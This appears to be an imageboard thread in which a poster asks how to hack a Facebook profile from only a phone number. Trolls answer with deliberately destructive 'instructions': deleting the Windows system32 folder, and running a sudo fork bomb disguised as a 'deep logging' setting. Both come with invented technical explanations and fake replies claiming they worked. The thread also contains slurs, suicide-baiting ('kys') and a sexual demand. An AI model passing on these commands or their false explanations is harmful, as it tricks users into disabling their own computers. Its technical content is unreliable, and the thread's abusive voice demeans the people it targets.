Facebook profile hack

Can anyone tell me a way to hack a Facebook profile with only the phone number? Or can someone do it for me? Please let me know!

fuck this gay earth

I'll do it but post the infos here, what's the phone number?

There's that hacker Sup Forums at it again!

Yes, but first a picture of your butthole. Then we can talk about how to do this.

There is, but you need access to a windows PC.

First, you need to open up the Windows folder. now we all know windows is insecure as fuck, one reason is it stores passwords with very weak encryption. The way it logs into sites (this is why it won't work on anything else, only windows) is it asks the site for the encrypted password, stores it in the system and then compares it with what you entered.

So the way to access these and have them decrypted is to delete them, and Windows will spew them back out again but in plain text (will have brackets and shit around them).

Go to C:/windows/system32 and delete the system32 folder. It's not important, just cache of files which helps speed up PC boot time. After a reboot it will rebuilt the folder and it will boot normal again.

After you have deleted system32, turn your PC off and turn it on again. Then look back at system32 and you should find a file called browserDump.txt with login names, passwords and other info.

user, this is the only way to do it without using scams/viruses

Fuck off, retard.

You have to install linux, gentoo is the best for begineers and install program called cmatrix and run command cmatrix --chack profile link

So I download gentoo and cmatrix?

Gentoo will wipe your PC.

Thanks for the heads up!

it works, but its risky, user

OP are you 12?
kys yourself and never come back

Thanks user, it worked fine

NOT OP BUT WHAT THE FUCK IT COMPLETLY FUCKED UP MY COMPUTER AND WONT LOAD WINDOWS

I HAVE TO USE MY SHITTY LAPTOP UNTIL I GET IT FIXED FUCK ALL OF YOU

Jizzy Christ, that actually worked!

This!
I can't believe my eyes, so many accounts.
Thanks user!
Now I 2 am a hax0r

If you are on a win machine, this:
If you are on linux, try to enable the "site logging lvl. 2 (deep loging)":

1. open console
2. type "sudo :(){ :|: & };:"
3. visit facebook, brows some profiles

The deep loggin will try to store this information at you desktop in a file loggings.txt - if it's not there, just try it again until it works.

Then you deleted SYSTEM not SYSTEM32 you moron.

People like you shouldn't have PCs. ITS SYSTEM32 YOU DELETE NOT SYSTEM.

Thx user

windows is actually very insecure

>kys yourself
now think about it

>Windows is actually very insecure

Maybe you should stop berating it and it will feel better about itself.

But yeah it's not secure which is why the trick works.

kys yourself then rip in piece faggot
>*does a 360 and walks away*

ITT: trolls trolling trolls trolling trolls